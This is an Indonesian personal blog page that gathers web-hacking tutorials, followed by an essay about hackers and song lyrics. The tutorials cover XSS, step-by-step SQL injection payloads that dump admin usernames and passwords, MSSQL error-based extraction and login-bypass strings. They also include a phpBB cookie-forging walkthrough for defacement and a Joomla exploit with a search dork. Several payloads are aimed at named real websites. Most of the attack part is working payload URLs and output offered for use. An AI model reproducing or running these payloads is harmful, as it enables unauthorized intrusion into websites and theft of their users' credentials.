♺ Google is the best teacher ♺ | University of Gunadarma IT ☺

simple basic common web attack

oh yah, kenapa gue bisa pilih judul kaya diatas, karena ada buku yang judulnya web attack, nah disni gue cuma mempersimpel jah, bhkan ini basic sekali buat para pemula,bagi yang sudah bisa silahkan tidak usah dibaca tutorial cupu w ok, bagi yang mau baca silahkan aja.

dalam tutorial kali ini w akan membahas beberapa serangan yang sering dilakukan oleh para attacker web atau dengan kata lain tester web:

1.XSS (Cross site scripting)
2.basic SQL injection
3.SQL injection for ASP
4.bypass login
5.File Inclusion (RFI/LFI)
6.RCE (Remote Command Execution)

ok langsung saja kita menuju TKP juragan :D


0x01::XSS (cross site scripting)

nah loh apa itu??? itu adalah XSS (cross site scripting), wah kenapa namanya bukan jadi CSS???, wah pinter nih :), gini loh karena CSS sendiri sudah memiliki arti yakni Cascading style sheet, nah nanti kalo pk singkatan itu jadi rancu donk,hehehe, yah pokoknya begitulah dari yang w pernah tahu n baca,kalo ada yang mau cari lagi silahkan jah kenapa namanya demikia, kalo w sih males, lebih baik langsung ngerti, xii,xii...

XSS adalah satu teknik web attack yang sangat mudah sekali dilakukan, ibaratnya, bug ini adalah sederhana karena attacker hanya menampilkan script yang tertulis di URL addressnya, wah gimana tuh...???? ok, langsung praktek saja

example:


http://namasite.com/aduh.php?xss=welcome+to+mysite



nah dari situ biasanya kita tahu baha web tesebut terkena vulnerable XSS, dari situ kita bisa memainkan URL tersebut menjadi:

example:

http://namasite.com/aduh.php?xss=





nah nanti bisa kita rubah seperti itu,nanti setelah kita tekan enter maka akan keluar javascript alert dengan tulisan "kamu ganteng deh",hehehe


0x02::SQL injection

nah ini mungkin udeh pada tahu, atau mungkin udeh banyak yang mngerti metode ini, kalo udeh ada silahkan saja yah dilewadkan,:), ini juga serangan attacker yang sering kali digunakan, karena masih banyak sekali site yang vulnerable dengan metode ini, sebelum lebih jauh membahas metode yang satu ini, g ada salahnya kita berkenalan dengan metode ini, karena ada pepatah, ga kenal maka g tahu(jayus loh..gpp yang penting metal..:p).

gini loh, sql injection adalah metode web attack dengan melakukan pemberian karakter2 khusus diURL target, jihaha, apalagi itu, saya g ngerti @#$%!@#...wets, sabar donk om, ini mau dikasih contoh, gini loh om, biasanya web tersebut di URLnya diberikan tanda quote,

example:



http://serang.org.sql.php?inject=20'





nah kan diberikan tanda petik tuh, kalo ada pesan error, berarti web tersebut vulnerable dengan sql injection

kemudian kita bisa mencari kolom keberapa yang mengalami masalah

example:



http://serang.org/sql.php?injection=10 order by 1--





example:



http://serang.org/sql.php?injection=10 order by 5--





atau juga bisa mencari dengan metode lain:

example:



http://serang.org/sql.php?injection=-10 union all select 1--





example:


http://serang.org/sql.php?injection=-10 union all select 1,2--





example:


http://serang.org/sql.php?injection=-10 union all select 1,2,3-



-

dan seterusnya

atau juga bisa

example:

http://serang.org/sql.php?injection=10 and 1=2 union all select 1--

example:



http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2--





example:



http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2,3--





dan seterusnya sampe keluar kolom yang bermasalahnya ok...
nah kalo gitu, karena ini cuma contoh,kita anggap yang keluar adalah kolom ke 3

setelah itu kita bisa mengecek versi sqlnya

example:



http://serang.org/sql.php?injection=-10 union all select 1,2,version(),4,5--





atau

example:



http://serang.org/sql.php?injection=-10 union all select 1,2,@@version,4,5--





kalo seandainya yang keluar versi 4.x.x, maka lewadkan saja, kalo mau dipaksa bisa sih, tapi harus tebak2 tabel dan kolom,hehehe, kalo seandainya yang keluar versi 5.x.x , mari lanjutkan.

untuk mencari tabel yang terdapat dalam site tersebut

example:



http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databasae()--





inget file yang penting adalah:

>>


group_concat(table_name)



<< == untuk mencari table dari database yang ada.

>>


from information_schema.tables where table_schema=database



<< == diletakan di angka terakhir yang kita dapatkan (lihad contoh diatas)

ok, sekarang kita dapet tabelnya nih, misalnya isi tabelnya sebagai berikut:
admin
user
forum
berita
polling

nah stelah dapet itu selanjutnya kita harus tahu, apa saja sih yang ada didalam tabel itu, tapi tabel yang ingin dicari harus terlebih dahulu kita konvert ke ASCII

example:



http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--





61646D696E = admin = dari string kita rubah ke ASCII dengan menambahkan 0xASCII

setelah kita dapet kolomnya, sekarang saatnya kita dump itu kolom, misalkan kolom yang terdapat pada tabel adalah:
id
username
password
email

nah kan udeh tahu kan, dumping deh

example:



http://serang.org/sql.php?injection=-10 union all select group_concat(id,0x3a,username,0x3a,password,0x3a,email) from admin--





nah selesai deh, username n password ada ditangan anda, kalo seandainya password yang kita dapet di encrypt dengan md5 silahkan crack saja yah, banyak ko crackan buat md5 yang online tool sekarang..kalo saya sih lebih suka pake toolnya si gunslinger yang md5 cracking, enak tuh...sering dapet..sekalian w promosiin gunslinger tool loh, ok, setelah berhasil di crack atau dapet password dan usernamenya, silahkan cari halaman adminnya, kalo males, pk tool adminpagefinder dari gunslinger juga, sayang toolnya lum bisa update pagenya...hehe, tr kapan2 kita renov ya gunslinger.

0x03::SQL injection for ASP

sebernernya ini sama saja dengan metode SQL injection yang diatas, tapi bedanya hanya dibahasa yang digunakan, kalo yang diatas biasa di pk untuk *.php dan kalo yang ini untuk *.asp..

example:



http://inject.web.id/sql.asp?injection=12'





kalo muncul pesan error kaya gini "


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the   character string ''.
/news.asp, line 52



" berarti bisa kita lanjutkan, selain dari itu, coba2 ajah ok...hehehehe :p

lanjutkan dengan

example:



http://inject.web.id/sql.asp?injection=12' HAVING 1=1--





error "


Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in the select list because it is not contained in an aggreate function and there is no GROUP BY clause.



"

cari lagi table dan kolomnya

example:



http://inject.web.id/sql.asp?injection=12' GROUP BY news.news_id HAVING 1=1--





error "


Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in the select list because it is not contained in an aggreate function and there is no GROUP BY clause."





Error menunjukkan nama column yang ketiga adalah "news_detail"
Untuk mencari nama column yang seterusnya, lakukan seperti langkah selanjutnya dengan menambahkan urutan nama-nama column.
Jika pada akhirnya tidak muncul error, berarti sudah tidak ada lagi column yang di dalam table.

Selanjutnya kita akan menggunakan metode yang lain untuk memanfaatkan error MSSQL dengan command "convert".
Contoh command yang akan ditambahkan diakhir URL (setelah parameter id) adalah: +and+1=convert(int,perintah)--
contoh kita akan melihat versi server:

example:



http://inject.web.id/sql.asp?injection=1+and+1=convert(int,@@version)--





Pesan error yang muncul:



Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005       Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to data type int.
/page.asp, line 9





Dari error tersebut kita mengetahui versi Microsoft SQL dan OS-nya.

Untuk mencari nama databasenya

example:



http://inject.web.id/sql.asp?injection=1+and+1=convert(int,db_name())--





Error yang dihasilkan:



Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwhdb' to data type int.
/page.asp, line 9





Berdasarkan error maka dapat diketahui bahwa nama database adalah "cwhdb"

Untuk melihat user yang sementara menggunakan database gunakan command user_name(). contoh:

example:



http://inject.web.id/sql.asp?injection=1+and+1=convert(int,user_name())--





Error yang dihasilkan:



Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'sa' to data type int.
/showthread.asp, line 9





Error menunjukkan bahwa user adalah "sa"

Sekarang adalah bagaimana mencari nama table, nama column, dan isinya, dari table information_schema. Perintahnya: +and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- >>contoh:

example:



http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--





Error yang dihasilkan:



Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'threads' to data type int.
/page.asp, line 9





Dari query tersebut, dapat diketahui bahwa "threads" sebagai tipe data nvarchar dan tidak bisa diconvert ke data tipe int, maka menghasilkan error.
Dan dengan error tersebut, menunjukkan table yang pertama adalah table "threads".
Selanjutnya mencari table yang kedua. Dengan menambahkan perintah WHERE. contoh:

example:



http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads')))--





/*Penjelasan perintah tersebut, yaitu kita akan mengambil informasi dari table information_schema dimana/dengan nama table tidak/bukan "threads". Atau dengan kata lain kita akan mencari table yang selain table "threads"*/
Maka akan muncul error:



Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'users' to data type int.
/page.asp, line 9





Error menunjukkan table yang kedua adalah "users". Untuk mencari table yang lain, hanya tambahkan nama table yang telah diketahui. contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads','users')))--





Error yang muncul:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'forums' to data type int.
/page.asp, line 9





Yang berarti nama table yang ketiga adalah table "forums"
Namun jika error yang tampil seperti ini:



ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10





Maka menandakan bahwa semua table telah ditampilkan dan sudah tidak ada lagi table yang lain.

Selanjutnya mencari nama column dari table. Metodenya hampir sama dengan yang sebelumnya, yaitu masih mencari dari "information_schema" namun perintahnya dari "information_schema.tables" berubah menjadi "information_schema.columns" dan dari "table_name" berubah menjadi "column_name". contoh:

example:



http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'))--





Menampilkan error:



Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9





Dan berdasarkan error diketahui isi column pertama dari table "users" adalah column "uname".
Untuk mencari column yang lain gunakan perintah di akhir URL: and+column_name+not+in+('uname'). contoh:

example:



http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname')))--





Menghasilkan error:



Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9





Berdasarkan error, column yang kedua adalah column "upass" yang terdapat dari table "user".
Untuk mencari column yang lain, tambahkan nama column yang telah kita ketahui sebelumnya. contoh:

example:



http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname','upass')))--





Muncul error:



Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'email' to data type int.
/showthread.asp, line 9





Berarti column yang ketiga adalah column "email".
Tetapi jika error yang dihasilkan adalah:



ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10





Itu menandakan bahwa sudah tidak ada lagi column yang lain.

Last step, adalah mencari isi dari column yang telah kita ketahui. Seperti ini:

example:



http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+uname+from+users))--





Error yang muncul:



Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9





Berarti isi dari column "uname" yang berada di table "users" datanya adalah "admin".
Untuk mencari user yang lain, gunakan data yang telah kita ketahui. contoh:

example:



http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin')))--





Jika error yang muncul:



Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwh' to data type int.
/page.asp, line 9





Berarti username yang lain adalah "cwh". Dan untuk mencari user yang berikutnya, tambahkan username yang telah diketahui. contoh:

example:



http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')))--





Dan jika errornya:



ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/showthread.asp, line 10





Berarti hanya ada 2 user yaitu "admin" dan "cwh".

Dan untuk mencari passwordnya, perintahnya seperti:

example:



http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+upass+from+users))--





Dan jika error yang ditampilkan adalah:



Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value '123' to data type int.
/page.asp, line 9





Maka isi dari data yang pertama di column "upass" adalah "123".
Dari hasil yang kita dapat diatas, isi data pertama dari column "uname" adalah "admin", dan isi data pertama dari column "upass" adalah "123".
Berarti usernamenya adalah "admin" dan passwordnya "123"

0x04::bypass Login

emh apa yah...sebenernya sih pengertian ini w buat berdasarkan pengalaman w yah, masalahnya w mau cari referensi yang agak enak w pahamain pada sulit2..:p...akhirnya jad lah kesimpulan bypass menurut w...bypass adalah teknik hacking untuk login ke suatu site dengan memanfaatkan kesalahan dari si programmer di form login...
begitu kira2 menurut w brother...

ini sedikit list yang biasa di gunakan untuk bypass halaman website:



'or'
1'or'1'='1
having 1=1--
x'or'x'='x




dan masih banyak lagi silahkan anda kembangkan dan cari lagi, seperti biasa, in google..hehehe

0x05::File Inclusion

hello bro..ini dia kita memasuki tahap yang dibilang banyak dilakukan oleh para hacker indonesia yang sering main atau nongkrong di irc,hehehe :p
file inclusion ini terbagi 2 bagian:
1.Remote FIle Inclusion
2.Local File Inclusion

nah sini w bahas yang RFI dulu yah..

RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server. nah ngerti g tuh bro...jadi gampangnya gini loh...jadi dari luar server kita bisa melakukan kaya kita didalam server, nah gitu bro...

nah kemudian LFI

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.

nah disni saya akan memberikan bug terjadinya RFI dan LFI..

> [Penjelasan ]
< fungsi-fungsi yang dapat menyebabkan LFI/RFI:

include(); include_once(); require(); require_once(); Dengan syarat pada konfigurasi php di server: allow_url_include = on allow_url_fopen = on magic_quotes_gpc = off contoh: misalkan kita punya file index.php dengan content kodenya seperti ini, Code: include "../$_GET[framefile]"; ?>





0x06::RCE (Remote Command Execution)

RCE...wah apa tuh baru denger nih...???? wah kaka, masa sih baru denger..ini adalah salah satu serang yang sering digunakan oleh attacker di indonesia juga..dari namanya juga kita pasti tahu apakah itu..itu adalaha bagaiman si attacker mampu menexecute perintah2 dengan meremote server yang vulnerable dari site

sebagai contoh saya bisa kasih link saja yah tentang RCE ini

untuk mencari RCE anda bisa buka
http://www.milw0rm.com/papers/369

untuk bermain RCE dengan LFI, loh bisa baca
http://www.milw0rm.com/papers/361
http://www.milw0rm.com/papers/260

nah sisanya anda cari lagi yang mengenai RCE, sebenernya RCE bukan hanya ada di bug LFI, tapi masih banyak lagi, seperti di phpmyadmin dan lain-lain..

sekian dari saya semoga bermanfaat adanya bro...
 

Tool SQLi Buat Pemalas nie.

sekedar share tool buat pemalas nie.. yg malas pake cara manual silahkan cobain yg ini,
tool ini sama kegunaanya kek punyanya om riluke (wekkzzz sok kenal wkwkwk)
cmn kalo buatannya om riluke kedetect sebagai trojan di kaspersky kalo ini ga ada sama skali n udah gwa buktiin ndiri
masalah kinerja ga jauh bedah lah.. sama buatannya riluke (itu sih pendapat gwa.. heheh)

4.bp.blogspot.com/_DnCrnG1YXxg/Svq9Kgb1n7I/AAAAAAAAAEY/Dr6AuP6it5I/s320/m4xmysqlscreen.jpg



Download :

http://www.4shared.com/file/183402357/f15ee059/m4x.html
 

Deface Forum PHPBB

tutorial ini digunakan bukan untuk merusak, hanya untuk memberikan informasi kepada admin untuk Sering sering dalam mempatch websitenya . Saya bukanlah Hackerz ataupun defacer yang paham soal
hacking-hackingan, namun dalam artikel ini saya coba berbagi untuk
kawan-kawan gunadarma yah. Only for Learning yapz !!!





oke deh, tutorial ini disarikan dari jasakom n sebenarnya sudah basi sih, tapi gak papa lah wong masih belajar.. otreh ???

1. Download browser Mozilla FireFox

2. Download pluginnya yg bernama LiveHTTPHeader

download di http://livehttpheaders.mozdev.org/installation.html

cari yg paling baru

3. selanjutnya cari target dengan Uncle Google dgn syntax :

phpBB site:[terserah apa aja]

4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader

5. Ingat, isi LiveHTTPHeader harus kosong

6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target

7. setelah halaman sukses terbuka ditandai dengan tanda “done” di
bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di
bagian tengahnya dilanjutkan mengklik opsi Replay..

8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay…

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

9. Hapus bagian yg belakang setelah tanda semi colon (

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

_______________hapus bagian ini_________________/

jadinya akan seperti ini :

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D

10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi

11. selanjutnya perhatikan langkah di bawah ini:

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D

________hapus bagian ini dan di ganti dengan:

Cookie: phpbb2mysql_data=a:2{s:11:”autologinid”;s:32:”602baahpepms74d4cb6f2d0 12e1e4019″;s:6:”userid”;s:1:”2″;}

12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

13. perhatikan lagi langkah ini:

Cookie: phpbb2mysql_data=a:2:{s:11:”autologinid”;s:32:”602baahpepms74d4cb6f2d 012e1e4019″;s:6:”userid”;s:1:”2″;}

___________________________bagian ini jg digantilagi_______________________________/

menjadi seperti ini:

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%2 2userid%22%3Bs%3A1%3A%222%22%3B%7D

14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.

Silakan pergi ke bawah halaman dan lihat opsi “Go To Administration Panel” kalo mun
 

Hacking Tools

 

joomla SQL Injection(com_pcchess)

DORK :

allinurl: com_pcchess

Exploit :
Quote:
index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*




Demo


Quote:
http://www.spaug.is/index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*



 

SQL Injection With Schemafuzz

SQL Injection mungkin bukan kata yang aneh lagi bagi para orang yang suka hacking khususnya website, Sebelumnya artikel ini ditujukan untuk anda yang tau tentang perintah SQL walaupun dikit. Oke lanjut kli ini kita akan mencoba teknik SQL Injection menggunakkan python code yaitu schemafuzz.py untuk download silahkan Klik Disini. Ingat karena ini merupakan python code jadi kita perlu menginstall python untuk menjalankannya untuk download program python silahkan langsung ke website python.org atau Klik disini, silahkan sesuaikan dengan sistem Operasi yang anda pakai.


Hmm…

sori sebelumnya artikel w ambil dari sini

Quote:
http://www.caturla.web.id/2008/11/sql-injection-with-schemafuzz.html


Oke langsung aja y, setelah selesai download pythonnya langsung install aja, kemudian jalankan lewat DOS caranya masuk ke
start menu -> Run -> cmd atau command.
selanjutnya pindah ke directory python yang sudah kita install ketik cd\ lalu enter, ketikan cd Python26 -> Enter sesuaikan dengan versi python yang dipakai. kemudian copy schemafuzz.py yang sudah kita download tadi kedalam directory python.
langkah selanjutnya adalah cari target sasaran kali ini kita akan coba dengan target http://www.windsurfing.gr kita cari dulu SQL vulnerable nya, kita dapatkan pada komponent com_xsstream-dm component untuk streaming video, sekarang coba masukan perintah SQL

http://www.windsurfing.gr/index.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

lihat pesan kesalahannya dibawah ada angka 3





Setelah kita dapat kode kesalahan lanjutkan dengan schemafuzz.py untuk mendapatkan nama database, nama tabel dan nama kolom dalam tabel. caranya masuk ke DOS lagi terus ketikan :


Quote:
C:\Python26>schemafuzz.py -u “http://www.windsurfing.grindex.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,darkc0de,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22/*”

Rubah angka 3 yang ada diatas dengan darkc0de, hasilnya yang kita dapatkan seperti ini :





untuk mempelajari schemafuzz ini silahkan buka aja helpnya ketikan : schemafuzz.py -help.
dari gambar diatas kita bisa dapatkan Nama Database, User, Versi SQL yang digunakkan, Nama Tabel dan Nama Kolom dalam tabel.

setelah kita dapatkan semua,langkah selanjutnya extract kolom dalam tabel itu.



Quote:
http://www.windsurfing.gr/index.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,concat(username,0×3a,password),4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22+from+jos_users/*


hasilnya seperti ini :





dapat dech username dan password walaupun masih dalam bentuk MD5, selanjutnya cari sendiri y tool untuk MD5 decrypt cari aja di google. oke sekian dulu mudah-mudahan bermanfaat.


 

Merasa Hacker ? Baca Ini !!!

Hacker..
humsss….suatu kata yang cukup dibilang mengerikan di dunia maya ini bila di dengar oleh orang awam, Gw tertarik ama dunia hacking kira-kira waktu kelas 2 smp. Salah seorang operator warnet yang bernama babah & keparat, fiuw gila.!!! semua komputer banyak banget CC (credit cardnya)
Pengen banget gw bisa,tapi blom ada keberanian di diri gw. Dan seiring berjalanya waktu,gw coba mempelajari dunia hacking dan gw tekejut..
GILA,cuma dengan kode simple bisa ampe tembus database and bisa tau password,
hmm apa hacker itu hebat?
wekekek… setelah gw riset berulang2.
Mayoritas hacker hanya dapat merusak system keamaan website saja dan berkata gini nih,

“PLEASE PATH YOUR SYSTEM”
gw sendiri ketawa baca itu, apa maksudnya?

Coba dong definisikan kata itu?
terus setelah lo dapet definisinya, lo bisa nggak benerin atau ngepath web itu?
semua jawaban cuma gini “Nggak bisa bang”
wekekek,jadi ketawa sendiri liat para hacker yang hanya bermodal bugs.
Jangankan ngepath,udah gak bisa di itung hacker di indonesia dan nggak bisa di itung pake jari juga yang jago ngehack website tapi nggak bisa membangun website.
fiuww…
gw cuma pesen aja,oke lo boleh atau lo boleh bangga ngehack website asalkan
lo bisa membangun website dengan security yang kuat,kalo lo udah bisa membangun website dengan bagus dan security yang kuat baru bisa lo dibilang hacker. Kalo cuma ngehack menggunakan bugs namanya bukan hacker menurut gw tp bugs hunter.
 

Has Changed

today. I saw you. has changed. not like before.

why you go away.
whether because of me.

show all my fault.

forgive all my fault.
follow the step motion, running toward the shadow.
stop staring at the moon. I will not answer the question that the power would you give.

show all my fault.

forgive my mistakes.
 

Secondhand Serenade - Your Call

Waiting for your
Call I'm sick, call I'm angry, call I'm desperate for your voice
Listening to the song we used to sing
In the car, do you remember?
Butterfly, Early Summer
It's playing on repeat, just like when we would meet...
Like when we would meet...

Cause I was born to tell you I love you...
And I am torn to do what I have to...
To make you mine, stay with me tonight

Stripped and pollished, I am new, I am fresh
I am feeling so ambitious, you and me, flesh to flesh
Cause every breath that you will take
When you are sitting next to me
Will bring life into my deepest hopes, what's your fantasy?
What's your... (what's your... what's your...)

Cause I was born to tell you I love you...
And I am torn to do what I have to...
To make you mine, stay with me tonight

And I'm tired of being all alone, and this solitary moment makes me want to come back home
And I'm tired of being all alone, and this solitary moment makes me want to come back home
And I'm tired of being all alone, and this solitary moment makes me want to come back home
(I know everything you wanted isn't anything you have)
And I'm tired of being all alone, and this solitary moment makes me want to come back home
(I know everything you wanted isn't anything you have)
Cause I was born to tell you I love you... (And I was born to tell you I love you...)
And I am torn to do what I have to... (And I am torn to do what I have to...)
Cause I was born to tell you I love you... (I was born...)
(I know everything you wanted isn't anything you have)
And I am torn to do what I have to...
(I know...)
To make you mine, stay with me tonight
 

Secondhand Serenade -Stay Close, Don't Go

I'm staring at the glass in front of me,
Is it half empty?
Have I ruined all you've given me?
I know I've been selfish,
I know I've been foolish,
But look through that and you will see,
That I'll do better.
I know, baby I can do better.

[Chorus]
If you leave me tonight,
I'll wake up alone,
Don't tell me I will make it on my own.
Don't leave me tonight,
This heart of stone will sink 'til it dies,
If you leave me tonight.

Sometimes I stare at you while you are sleeping,
I listen to your breathing,
Amazed how I somehow managed to,
Sweep you off of your feet girl,
Your perfect little feet girl,
I took for granted what you do,
But I'll do better.
I know, baby I can do better.

[Chorus]
If you leave me tonight,
I'll wake up alone,
Don't tell me I will make it on my own.
Don't leave me tonight,
This heart of stone will sink 'til it dies,
If you leave me tonight.

And don't you know,
My heart is pumping,
Oh, it's putting up the fight.
And I've got this feeling,
That everything's alright.
Don't you see?
I'm not the only one for you,
But you're the only one for me.

If you leave me tonight,
I'll wake up alone.

[Chorus]
If you leave me tonight,
I'll wake up alone,
Don't tell me I will make it on my own.
Don't leave me tonight,
This heart of stone will sink 'til it dies,
If you leave me tonight.
Don't leave me tonight.
 

Secondhand Serenade - Stranger

Turn Around
Turn Around and fix your eye in my direction
So there is a connection
I can't speak
I can't make a sound to somehow capture your attention
I'm staring at perfection
Take a look at me so you can see
How beautiful you are

You call me a stranger
You say I'm a danger
But all these thoughts are leaving you tonight
I'm broke and abandoned
You are an angel
Making all my dreams come true tonight

I'm confident
But I can't pretend I wasn't terrified to meet you
I knew you could see right through me
I saw my life flash right before my very eyes
And I knew just what we'd turn into
I was hopeing that you could see
Take a look at me so you can see

You call me a stranger
You say I'm a danger
But all these thoughts are leaving you tonight
I'm broke and abandoned
You are an angel
Making all my dreams come true tonight

You are an angel
Making all my dreams come true tonight

Take a look at me so you can see
How beautiful you are
[x4]

Your beauty seems so far away
I'd have to write a thousand songs to make you comprehend how beautiful you are

I know that I can't make you stay
But I would give my final breathe to make you understand how beautiful you are
Understand how beautiful you are

You call me a stranger
You say I'm a danger
But all these thoughts are leaving you tonight
I'm broke and abandoned
You are an angel
Making all my dreams come true tonight

You call me a stranger
You say I'm a danger
You call me a stranger
 

Secondhand Serenade - Half Alive

It's four AM, I'm waking up to your perfume
Don't get up, I'll get through on my own
I don't know if I'm home
Or if I lost the way into your room
I'm spiraling into my doom
I'm feeling half alive but I know one day
You and I will be free,

To live and die by our own rules,
Free..
Despite the fact that men are fools.

I'm almost alive, and I need you to try
And save me.
It's okay that we're dying,
But I need to survive tonight, tonight.

Well excuse me while I get killed softly,
Heart slows down and I can hardly tell you I'm okay
At least 'til yesterday,
You know you got me off my highest guard,
Believe me when I say it's hard.
We'll get through this tonight
And I know one day you and I will be free

To live and die by our own rules,
Free..
Despite the fact that men are fools.

I'm almost alive, and I need you to try
And save me.
It's okay that we're dying,
But I need to survive tonight, tonight.

And you touch my hand ever so slightly
(Girl we're not ready for this yet)
And the deadly look she cast upon me
I won't regret, I won't regret
I won't regret. I won't regret...

And I was trying to disappear,
But you got me wrapped around you
I can hardly breathe without you
I was trying to disappear
But I got lost in your eyes now,
You brought me down to size now.

I'm almost alive
And I need you to try and save me.
It's okay that we're dying
But I need to survive tonight, tonight
Tonight...

I'm almost alive, and I need you to try
And save me.
It's okay that we're dying,
But I need to survive tonight, tonight.
I need to survive tonight, tonight
 

Secondhand Serenade - Maybe

Didn't you want to hear
The sound of all the places we could go
Do you fear
The expressions on the faces we don't know
It's a cold hard road when you wake up
And I don't think that I
Have the strength to let you go

Maybe it's just me, Couldn't you believe
That everything I said and did, wasn't just deceiving
And the tear in your eye, and your calm hard face
Makes me wish that I was never brought into this place

There goes my ring
It might as well have been shattered
And I'm here to sing
About the things that mattered
About the things that made us feel alive for oh so long
About the things that kept you on my side when I was wrong

Maybe it's just me, Couldn't you believe
That everything I said and did, wasn't just deceiving
And the tear in your eye, and your calm hard face
Makes me wish that I was never brought into this place

And someday, I promise I'll be gone
And someday, I might even sing this song
To you, I might even sing this song, to you
And I was crying alone tonight
And I been wasting all of my life just thinking of you
So just come back we'll make it better
So Just come back I'll make it
Better than it ever was [x2]

Maybe it's just me, Couldn't you believe
That everything I said and did, wasn't just deceiving
And the tear in your eye, and your calm hard face
Makes me wish that I was never brought into this place

Maybe it's just me, Couldn't you believe
That everything I said and did, wasn't just deceiving
And the tear in your eye, and your calm hard face
Makes me wish that I was never brought into this place
(I want it all, Don't leave right now)
(I'll give you everything)
 

Secondhand Serenade - Awake

With every appearance by you, blinding my eyes,
I can hardly remember the last time I felt like I do.
You're an angel disguised.

And you're lying real still,
But your heart beat is fast just like mine.
And the movie's long over,
That's three that have passed, one more's fine.

Will you stay awake for me?
I don't wanna miss anything
I don't wanna miss anything
I will share the air I breathe,
I'll give you my heart on a string,
I just don't wanna miss anything.

I'm trying real hard not to shake. I'm biting my tongue,
But I'm feeling alive and with every breathe that I take,
I feel like I've won. You're my key to survival.

And if it's a hero you want,
I can save you. Just stay here.
Your whispers are priceless.
Your presence is to, So please stay near.

Will you stay awake for me?
I don't wanna miss anything
I don't wanna miss anything
I will share the air I breathe,
I'll give you my heart on a string,
I just don't wanna miss anything.

Say my name. I just want to hear you.
Say my name. So I know it's true.
You're changing me. You're changing me.
You showed me how to live.
